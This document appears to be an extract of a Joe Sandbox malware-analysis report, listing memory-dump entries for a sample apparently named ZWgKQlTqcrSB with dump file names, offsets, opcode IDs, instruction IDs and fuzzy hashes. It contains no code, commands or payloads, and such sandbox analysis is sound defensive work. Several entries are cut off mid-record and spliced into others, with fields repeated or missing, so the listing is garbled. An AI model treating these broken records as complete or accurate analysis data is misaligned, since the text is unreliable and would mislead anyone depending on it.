• Source File: 00000018.00000002.3087623037.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_7ffd9bbc0000_ZWgKQlTqcrSB.jbxd
Similarity
• API ID:
• String ID: a1_L
• API String ID: 0-3309210877

Control-flow Graph (graph not reproduced; legend: Executed, Not Executed)

Strings
Memory Dump Source
• Source File: 00000018.00000002.3087623037.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_7ffd9bbc0000_ZWgKQlTqcrSB.jbxd
Similarity
• API ID:
• String ID: r<_H
• API String ID: 0-2284266438

Control-flow Graph (graph not reproduced; legend: Executed, Not Executed)

Strings
Memory Dump Source
• Source File: 00000018.00000002.3087623037.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_7ffd9bbc0000_ZWgKQlTqcrSB.jbxd
Similarity
• API ID:
• String ID: d
• API String ID: 0-2564639436
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000018.00000002.3110033988.00007FFD9BF80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF80000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_24_2_7ffd9bf80000_ZWgKQlTqcrSB.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 191ac722dd75d87b937cc301bd0bd279054be7e22252c6a22f42912cd9b2015e
                                                                                                                                                                          • Instruction ID: 9448fc18ba24c5a3b88e230b8278bafdfaf24d9e8ae995134cb9b5e48f476b9e
                                                                                                                                                                          • Opcode Fuzzy Hash: 191ac722dd75d87b937cc301bd0bd279054be7e22252c6a22f42912cd9b2015e
                                                                                                                                                                          • Instruction Fuzzy Hash: 4421A103F5F59B9AF6761EF924329BC5A80AF51B14F1B03B6D45E860E2CD0F3B405282
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000018.00000002.3087623037.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_24_2_7ffd9bbc0000_ZWgKQlTqcrSB.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 2f59d03601524a618acb6154fa45cd6968c4d5098dee9500a985a67fb06800e3
                                                                                                                                                                          • Instruction ID: 0fda4510b30c7351f5e1720abf5db766b40f2850cc11d7e9b2d7295c65c0e4a2
                                                                                                                                                                          • Opcode Fuzzy Hash: 2f59d03601524a618acb6154fa45cd6968c4d5098dee9500a985a67fb06800e3
                                                                                                                                                                          • Instruction Fuzzy Hash: A3B1BC706166058FEB59DF48C0E16B53BA1FF49304B9541FCC85B8B69ACB78E982CB81
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000018.00000002.3110033988.00007FFD9BF80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF80000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_24_2_7ffd9bf80000_ZWgKQlTqcrSB.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 1b34720e3aa4b5e781e95cf4eddb590da446286c6a7f8e142fe9ba8858627128
                                                                                                                                                                          • Instruction ID: ffabc77167515c471056c85b33d2e6ac726c0588ba454307c9c43c9a7cba5fd2
                                                                                                                                                                          • Opcode Fuzzy Hash: 1b34720e3aa4b5e781e95cf4eddb590da446286c6a7f8e142fe9ba8858627128
                                                                                                                                                                          • Instruction Fuzzy Hash: 2E712431A4EC4D4FE778DE5888265B837E1EF44315B0613B9D05FCB5B2DE2AAA068781
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000018.00000002.3087623037.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_24_2_7ffd9bbc0000_ZWgKQlTqcrSB.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 47e1d96b1bc159ca92f0880a0102915565f9e9ada27bc6caf5f3e79a77b6a878
                                                                                                                                                                          • Instruction ID: ccb29d241e0ed963f557cfe30e77b11c286a70595587f9284b963a66d37a76af
                                                                                                                                                                          • Opcode Fuzzy Hash: 47e1d96b1bc159ca92f0880a0102915565f9e9ada27bc6caf5f3e79a77b6a878
                                                                                                                                                                          • Instruction Fuzzy Hash: 8471AF34B0994D8FEBB8EA8CC8655B837D1FF58315B160279D49EC75F1DA28E906C780
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000018.00000002.3110033988.00007FFD9BF80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF80000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_24_2_7ffd9bf80000_ZWgKQlTqcrSB.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 51332c643f2416138e85563993635dc150c4994a1181b3be95f02619c20aa160
                                                                                                                                                                          • Instruction ID: 79312cdb384886b4ac65312db2d75e2d370a86161177fa4004cc9566d31af296
                                                                                                                                                                          • Opcode Fuzzy Hash: 51332c643f2416138e85563993635dc150c4994a1181b3be95f02619c20aa160
                                                                                                                                                                          • Instruction Fuzzy Hash: 8C61F631B9E94D4FE778DE5888666B5B7C0EF4531070603B9D09FC35B2DA2AAA068781
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000018.00000002.3087623037.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_24_2_7ffd9bbc0000_ZWgKQlTqcrSB.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 5d6a2e2f347a6d89c773716401ea907c8439d9c749a701cb07403c3e6049cba9
                                                                                                                                                                          • Instruction ID: ffc7252c820a0bd4ddb39084cf75bc11b9ba167ee1c71ed687aae0a16532cf05
                                                                                                                                                                          • Opcode Fuzzy Hash: 5d6a2e2f347a6d89c773716401ea907c8439d9c749a701cb07403c3e6049cba9
                                                                                                                                                                          • Instruction Fuzzy Hash: 07719130F1E54E8EEBA5EBA884666BC77A1FF45304F9104BAD00ED71E5DE386941C741
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000018.00000002.3087623037.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_24_2_7ffd9bbc0000_ZWgKQlTqcrSB.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: fa1d4ce289f2e1f000958165fce91e31a5974278f4978f215758c36aa230a24d
                                                                                                                                                                          • Instruction ID: 7e40c1d230852758aa2d0c61fc99843b22582919cd5e9ea34b3a334d18b2a6b2
                                                                                                                                                                          • Opcode Fuzzy Hash: fa1d4ce289f2e1f000958165fce91e31a5974278f4978f215758c36aa230a24d
                                                                                                                                                                          • Instruction Fuzzy Hash: D351353260EB494FE76AEA6D98949707BE0FF5632471602BEC099C71B3D929B843C741
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000018.00000002.3110033988.00007FFD9BF80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF80000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_24_2_7ffd9bf80000_ZWgKQlTqcrSB.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 46a5660f665e7f471fa6baa25e396420456d330d9a715f90a318b47808eae821
                                                                                                                                                                          • Instruction ID: 5dbb298ccea5318717f27f5190495aeb40aa520a1d6b2e572c485744d750187f
                                                                                                                                                                          • Opcode Fuzzy Hash: 46a5660f665e7f471fa6baa25e396420456d330d9a715f90a318b47808eae821
                                                                                                                                                                          • Instruction Fuzzy Hash: 9471A131E5E94E8EEBA5DFA488646BC7BA1FF45310F1106BAD00FD71E1DE3A69418701
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000018.00000002.3087623037.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_24_2_7ffd9bbc0000_ZWgKQlTqcrSB.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 6b31a336766fa0288ca7206d4f0500b3238813188ffcf0b297d2316696b4c237
                                                                                                                                                                          • Instruction ID: add70bcb032335064deab9ce69f1a012b1172fca49abbefb76b04b7012871b7f
                                                                                                                                                                          • Opcode Fuzzy Hash: 6b31a336766fa0288ca7206d4f0500b3238813188ffcf0b297d2316696b4c237
                                                                                                                                                                          • Instruction Fuzzy Hash: C361C330E1E54E8EEBB5EBA88875ABC77A0FF55308F1545BAD00ED31E2DE286941C741
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000018.00000002.3110033988.00007FFD9BF80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF80000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_24_2_7ffd9bf80000_ZWgKQlTqcrSB.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: e7199c79a60dc1c779ab4bdce0bd872cfc9535c07dc22d1bfe700c850b864ecb
                                                                                                                                                                          • Instruction ID: a1f0b15a0d5e46d4bcf8ba9a4bf9b6c0320c3f9043461ff655f2b0d69f00ec26
                                                                                                                                                                          • Opcode Fuzzy Hash: e7199c79a60dc1c779ab4bdce0bd872cfc9535c07dc22d1bfe700c850b864ecb
                                                                                                                                                                          • Instruction Fuzzy Hash: 4A717B30A4AF4A8FE379CF54C1A466277A1FF45304B55467DC48B87AA6CA3BB942CB40
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000018.00000002.3087623037.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_24_2_7ffd9bbc0000_ZWgKQlTqcrSB.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: b79f9764a283e32b5a185e8b65c4fce5e7a392baa05b25b40da1e65e9d60171f
                                                                                                                                                                          • Instruction ID: dd4d307a37e18f1319fcfd146ffb88c239f2249eb6eed53c1f4081e05c00b414
                                                                                                                                                                          • Opcode Fuzzy Hash: b79f9764a283e32b5a185e8b65c4fce5e7a392baa05b25b40da1e65e9d60171f
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: d4db0eafe3dcef8e53ae67fa10eecb5f1f7a4bd0e268bb3ebf6888657eabf770
                                                                                                                                                                          • Instruction ID: a34554bf7e8c11705b4c8841b7d87fdde066f3c4a67c69870c5cdb9bc1c06279
                                                                                                                                                                          • Opcode Fuzzy Hash: d4db0eafe3dcef8e53ae67fa10eecb5f1f7a4bd0e268bb3ebf6888657eabf770
                                                                                                                                                                          • Instruction Fuzzy Hash: B1314D3170C9498FDF98EF18C0A5DA473E2FFB931470445AAD08AC72A2DE25EC85CB81
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000018.00000002.3110033988.00007FFD9BF80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF80000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_24_2_7ffd9bf80000_ZWgKQlTqcrSB.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 8830be7d383aa7578eb20c0d798209f8618fe227e0b60d48598bacbee49fbc54
                                                                                                                                                                          • Instruction ID: 59f2e70406e9c7ace39bbba883fb55c98da844244304c8616ecf4989790b2adc
                                                                                                                                                                          • Opcode Fuzzy Hash: 8830be7d383aa7578eb20c0d798209f8618fe227e0b60d48598bacbee49fbc54
                                                                                                                                                                          • Instruction Fuzzy Hash: F43130316089498FDF59EF28C0A5EA4B3E1FBA9314B0542AAD05EC7292CE35E945CB81
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000018.00000002.3110033988.00007FFD9BF80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF80000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_24_2_7ffd9bf80000_ZWgKQlTqcrSB.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: c8057636fecf307cc7be7ae2235fe49b16fb430ca474db51fec78800baf2677c
                                                                                                                                                                          • Instruction ID: 7fb6720f3d996044d5174a1e387397276bf67bb8fceeea27067911369d7a0059
                                                                                                                                                                          • Opcode Fuzzy Hash: c8057636fecf307cc7be7ae2235fe49b16fb430ca474db51fec78800baf2677c
                                                                                                                                                                          • Instruction Fuzzy Hash: E1313D3170CD498FDF98EF18C0A5EA4B7E1FBA931470502AED44ED7692DE25E845CB81
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000018.00000002.3110033988.00007FFD9BF80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF80000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_24_2_7ffd9bf80000_ZWgKQlTqcrSB.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 4fac71adea9bb0661ea200639190e4ba220cc9fe080716ba5b9b96a210cfb58d
                                                                                                                                                                          • Instruction ID: 8b1b00e7fc49d3e269c9cc58f058670bc8fbc13e5de8bed110bc72c3aa04133b
                                                                                                                                                                          • Opcode Fuzzy Hash: 4fac71adea9bb0661ea200639190e4ba220cc9fe080716ba5b9b96a210cfb58d
                                                                                                                                                                          • Instruction Fuzzy Hash: 70311630A5AD4ECFEBA8DF9484A15BD77A1FF54300F52027AD11FD61A2CA3B6A008B41
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000018.00000002.3087623037.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_24_2_7ffd9bbc0000_ZWgKQlTqcrSB.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 03fdd3335977546a5da92709645770973189e70476500749bc78e7b409e36588
                                                                                                                                                                          • Instruction ID: d79469f3923b8d73516b64f2c5e1c6b61824f2035d64ce73566543043ec8fe91
                                                                                                                                                                          • Opcode Fuzzy Hash: 03fdd3335977546a5da92709645770973189e70476500749bc78e7b409e36588
                                                                                                                                                                          • Instruction Fuzzy Hash: 3731383070E24A4FD755FB68C0E59B57B90AF51310B1682FAD408CF1EBDA29ED46C381
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000018.00000002.3087623037.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_24_2_7ffd9bbc0000_ZWgKQlTqcrSB.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: ec26e686ab8520aa4def0328d4be64011b51e956d527b61c5fee27c909bdf092
                                                                                                                                                                          • Instruction ID: f66ed29e38a4b2ff2dab420d3e96ca48cb3cb32951860be30ce653580bdcf3ea
                                                                                                                                                                          • Opcode Fuzzy Hash: ec26e686ab8520aa4def0328d4be64011b51e956d527b61c5fee27c909bdf092
                                                                                                                                                                          • Instruction Fuzzy Hash: EB319131E1EA9D9FDBA5EB98C8B09FC7BB0FF58304F15416AD019E72E2CA246905C741
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000018.00000002.3087623037.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_24_2_7ffd9bbc0000_ZWgKQlTqcrSB.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 7f4d2f89ef9ab661c13b205ae164cc2b9d807482959ed7a091c079348ac77bf6
                                                                                                                                                                          • Instruction ID: 70cfeb1d0632dedd376ef37613297c1c6d21398446313ea2bc8964460ea6d239
                                                                                                                                                                          • Opcode Fuzzy Hash: 7f4d2f89ef9ab661c13b205ae164cc2b9d807482959ed7a091c079348ac77bf6
                                                                                                                                                                          • Instruction Fuzzy Hash: 04215EB1B0990A9FDB98EB9CC4A1978B3A2FF983147518139D00ED3695CF24B952CB80
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000018.00000002.3110033988.00007FFD9BF80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF80000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_24_2_7ffd9bf80000_ZWgKQlTqcrSB.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: eaf44a6c72d60b5308808990587fa6c5b1c932e49c60425ed2ff2d5849c51f53
                                                                                                                                                                          • Instruction ID: 13b7e0c215e0da1db7823dad812a57a04f0e2a4f47005096489fe53d8dde573d
                                                                                                                                                                          • Opcode Fuzzy Hash: eaf44a6c72d60b5308808990587fa6c5b1c932e49c60425ed2ff2d5849c51f53
                                                                                                                                                                          • Instruction Fuzzy Hash: 59215B10B5D89A4AE7398A9484705B87B51EF8230171947BAE08BCF4B7D83DA9898340
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000018.00000002.3087623037.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_24_2_7ffd9bbc0000_ZWgKQlTqcrSB.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 14090b0d8504fb9e6d948f861681ab3fac0c8dcfefd02e960ac9a3e8611a9e24
                                                                                                                                                                          • Instruction ID: 8ff7f10a93068704488a0059ba350c948241314f2b74dadde9971c3d37ec7eb0
                                                                                                                                                                          • Opcode Fuzzy Hash: 14090b0d8504fb9e6d948f861681ab3fac0c8dcfefd02e960ac9a3e8611a9e24
                                                                                                                                                                          • Instruction Fuzzy Hash: 7C217130B2D6498BE678EA8C956013973E1FF95308B22053DD4CFD36E1DA24BB018646
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000018.00000002.3087623037.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_24_2_7ffd9bbc0000_ZWgKQlTqcrSB.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 8e42d2f93be083f074df7df3316574c46d73ddb645d23cb5530504afd0ee2952
                                                                                                                                                                          • Instruction ID: 5ec8c16c1a9fe5af3b9ae54d2387f264fef1b8b2ae821266754181c6159ac785
                                                                                                                                                                          • Opcode Fuzzy Hash: 8e42d2f93be083f074df7df3316574c46d73ddb645d23cb5530504afd0ee2952
                                                                                                                                                                          • Instruction Fuzzy Hash: 9031F930B1A54ECADBA8EF8884659BD77B1FF64308F51047AD01FD71E1DE34AA40E641
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000018.00000002.3087623037.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_24_2_7ffd9bbc0000_ZWgKQlTqcrSB.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 68636b24cba7fc0f695bfcfe13ea1c57d82f3f9c6ad5997627a7a6462d3bbb14
                                                                                                                                                                          • Instruction ID: 254c5b530e42a48daf168cf5d36f147031006c857e5366e658e05756adfc911b
                                                                                                                                                                          • Snapshot File: hcaresult_24_2_7ffd9bf80000_ZWgKQlTqcrSB.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 534a006e25cb7fd5f529be05f41792ae7e36da4b8a33586539154465d1177e4e
                                                                                                                                                                          • Instruction ID: 27ae160aa1f514d202a6ccc96e4dd10d096a323acda803ccaab0b5a17976eb5a
                                                                                                                                                                          • Opcode Fuzzy Hash: 534a006e25cb7fd5f529be05f41792ae7e36da4b8a33586539154465d1177e4e
                                                                                                                                                                          • Instruction Fuzzy Hash: 27211971A1990D9FDB98EF68C465AADB7A1EF58700F4101BED00FE32A1CE35A9408B40
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000018.00000002.3087623037.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_24_2_7ffd9bbc0000_ZWgKQlTqcrSB.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: cb905996110ad197060df51d783a92b3575082338bf38f37ea612aaa6a370a7b
                                                                                                                                                                          • Instruction ID: 17be28a6a359aa37a7d48457c7d4f34b174ad8aa917bd4a5b5cb27617641c236
                                                                                                                                                                          • Opcode Fuzzy Hash: cb905996110ad197060df51d783a92b3575082338bf38f37ea612aaa6a370a7b
                                                                                                                                                                          • Instruction Fuzzy Hash: 86115130B1950D8FDBA8EB58C8A6A3873E1FF49309F454179D05ED76E1CA35AD41CB40
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000018.00000002.3087623037.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_24_2_7ffd9bbc0000_ZWgKQlTqcrSB.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 9a28a0eae7cb598f6372a660deb05cf66a2f6c4d14ebfd659cb650a6b5771e31
                                                                                                                                                                          • Instruction ID: 69c3760ee9d4dbcc258b01ca2ab5d9ab205a7cc6ac6140bf27704cb92ff87c6f
                                                                                                                                                                          • Opcode Fuzzy Hash: 9a28a0eae7cb598f6372a660deb05cf66a2f6c4d14ebfd659cb650a6b5771e31
                                                                                                                                                                          • Instruction Fuzzy Hash: 5801DB30704A188FDB98DF1CD8A5A69B3E2FF99305B1141AED04ED76A6CE31AC41CB41
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000018.00000002.3087623037.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_24_2_7ffd9bbc0000_ZWgKQlTqcrSB.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: f098c9729bd35d5317b47c983c42592e2a309647bc172f15fe57011a0c68d91d
                                                                                                                                                                          • Instruction ID: 94859e7a62ce9d5cfbec5072e6136ebaecafb3aaeeefebf07a12461faa7fd1dc
                                                                                                                                                                          • Opcode Fuzzy Hash: f098c9729bd35d5317b47c983c42592e2a309647bc172f15fe57011a0c68d91d
                                                                                                                                                                          • Instruction Fuzzy Hash: E9012421B0E2CD1FEB71DAE888606AA3FA0AB63340F0600B6E049D71D2D9586945C3A2
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000018.00000002.3110033988.00007FFD9BF80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF80000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_24_2_7ffd9bf80000_ZWgKQlTqcrSB.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 8fc8b319950d2f7ba1681950168d93ba25da896b0c8e801af1f70435b1625b63
                                                                                                                                                                          • Instruction ID: fa0684aef3f7488e920a3fcdfb56128b49fb9950ba4fb7be4f2c9ceae57ae1e7
                                                                                                                                                                          • Opcode Fuzzy Hash: 8fc8b319950d2f7ba1681950168d93ba25da896b0c8e801af1f70435b1625b63
                                                                                                                                                                          • Instruction Fuzzy Hash: C1014731B4E68D0FEB318AB04C206A63A94DF4B340F0903B6E08AD70F2C92D5E04C361
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000018.00000002.3087623037.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_24_2_7ffd9bbc0000_ZWgKQlTqcrSB.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 4527c59bea93b4649b94e3ccf7c121d9d8965fbebe5a2fb0b643c220e57ebc1b
                                                                                                                                                                          • Instruction ID: be8604d4d98b8dbff930eaf864275d980a582bb2f79f3890ed90eb809f13971b
                                                                                                                                                                          • Opcode Fuzzy Hash: 4527c59bea93b4649b94e3ccf7c121d9d8965fbebe5a2fb0b643c220e57ebc1b
                                                                                                                                                                          • Instruction Fuzzy Hash: CA012C30B15A0C8FDBA8DF18C8AAA79B3E1FF59305B0141AED04ED76A5CE31AD41CB01
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000018.00000002.3087623037.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
